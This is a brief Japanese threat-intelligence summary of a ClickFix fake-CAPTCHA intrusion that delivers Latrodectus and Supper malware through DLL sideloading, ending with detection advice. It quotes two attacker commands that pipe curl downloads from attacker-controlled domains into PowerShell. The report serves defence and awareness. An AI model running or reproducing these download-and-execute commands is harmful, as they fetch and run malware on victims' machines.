概要
Fake CAPTCHA(ClickFix)ページを使用した攻撃者が、単一のユーザークリックを企業全体への侵害につなげる手法を用いています。この手法は最近、ポーランドの大手組織で発生しました。
攻撃チェーン
攻撃者はソーシャルエンジニアリング、DLLサイドローディング、および二つのマルウェアファミリー(LatrodectusとSupper)を使用して、持続性を確保し、偵察を行い、さらなる攻撃の準備を行いました。
フェイクCAPTCHAページ
ユーザーに対して実際の人間認証ではなく、Win+Rキーを押すよう指示しました。これにより、ユーザーは悪意のあるPowerShellスクリプトを実行することになります。
ダウンロードと実行
攻撃者はコマンドを使用して、攻撃者が制御するドメインからさらなるペイロードをダウンロードし、実行しました。例えば:
cmd /c curl naintn.com/amazoncdn.com/... | powershellcmd /c curl jzluw.com/cdn-dynmedia-1.microsoft.com/... | powershell
Latrodectusローダー
調査者は、インテルディレクトリにigfxSDK.exe、version.dll および wtsapi32.dllが存在することを確認しました。これはDLLサイドローディングの典型的なパターンであり、正当な実行可能ファイルが悪意のあるライブラリを読み込むために悪用されています。
Supperマルウェア
さらに、Supperファミリーに関連する2つのDLLも見つかりました。これらのDLLはハードコードされたC2エンドポイントに接続し、タスクの更新や任意のプログラムの実行を可能にする機能を持っています。
防御策
ユーザーに対する意識向上と、クリップボード駆動型Runダイアログの実行、不審なcmd.exeおよびPowerShellベースのダウンロードパターン、Latrodectus/Supperの特徴的なC2ドメインやIPアドレスを監視することが重要です。